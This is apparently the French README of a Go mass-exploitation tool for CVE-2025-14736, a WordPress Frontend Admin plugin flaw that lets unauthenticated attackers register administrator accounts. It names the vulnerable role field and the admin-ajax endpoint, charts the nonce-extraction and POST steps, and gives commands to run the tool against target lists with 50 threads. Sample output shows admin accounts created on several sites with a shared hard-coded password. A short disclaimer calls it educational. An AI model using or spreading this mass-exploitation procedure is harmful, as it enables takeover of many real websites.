
Élévation de privilèges non authentifiée vers administrateur via le champ de formulaire de rôle
Auteur : Hyun Chiya
| Champ | Valeur |
|---|---|
| ID CVE | CVE-2025-14736 |
| Extension | Frontend Admin by DynamiApps |
| Versions affectées | <= 3.28.25 |
| Type de vulnérabilité | Élévation de privilèges non authentifiée |
| Sévérité | Critique |
Le plugin Frontend Admin pour WordPress est vulnérable à une élévation de privilèges non authentifiée en raison d'une validation insuffisante des champs contrôlés par l'utilisateur lors de l'inscription. Les attaquants peuvent injecter des rôles arbitraires, y compris administrator, en manipulant la charge utile de soumission du formulaire.
La logique vulnérable réside dans le traitement des soumissions de formulaire où le champ role est considéré comme fiable à partir de l'entrée utilisateur sans vérifier si l'utilisateur est autorisé à attribuer ce rôle. Plus précisément, le champ acff[user][field_user_role_ID] peut être modifié en administrator.
flowchart TD
A["Attacker visits Registration Page"] --> B["Extract Nonce (_acf_nonce) & Form ID (_acf_form)"]
B --> C["Construct POST payload with 'role'='administrator'"]
C --> D["POST to /wp-admin/admin-ajax.php"]
D --> E{"Verification"}
E -->|Success| F["New Admin User Created"]
style F fill:#ff6b6b,stroke:#c92a2a,color:#fffgo build -o mass_exploit.exe mass_exploit.go
.\mass_exploit.exe -l list.txt -t 50
| Argument | Description |
|---|---|
-l | Chemin vers la liste des URL cibles (par défaut : list.txt) |
-t | Nombre de threads simultanés (par défaut : 10) |
-timeout | Délai d'attente de la requête en secondes (par défaut : 15) |
>> [ EN LIGNE ]
╔═══════════════════════════════════════════════════════════════════════════════════════╗
║ CVE-2025-14736 - Outil d'exploitation de masse ║
║ Élévation de privilèges Frontend Admin par DynamiApps ║
║ Auteur : Hyun Chiya ║
╚═══════════════════════════════════════════════════════════════════════════════════════╝
>> [ INFORMATIONS ]
[*] 500 cibles chargées. Début du scan avec 50 threads...
[SUCCÈS] http://target.com | Utilisateur : hacker_mass | Mot de passe : Password123! | ID formulaire : 48
[SUCCÈS] http://example.org | Utilisateur : hacker_mass | Mot de passe : Password123! | ID formulaire : 32
[*] Scan terminé.
Cet outil est fourni à des fins éducatives et de tests de sécurité autorisés uniquement. L'accès non autorisé à des systèmes informatiques est illégal. Utilisez-le de manière responsable.
Hyun Chiya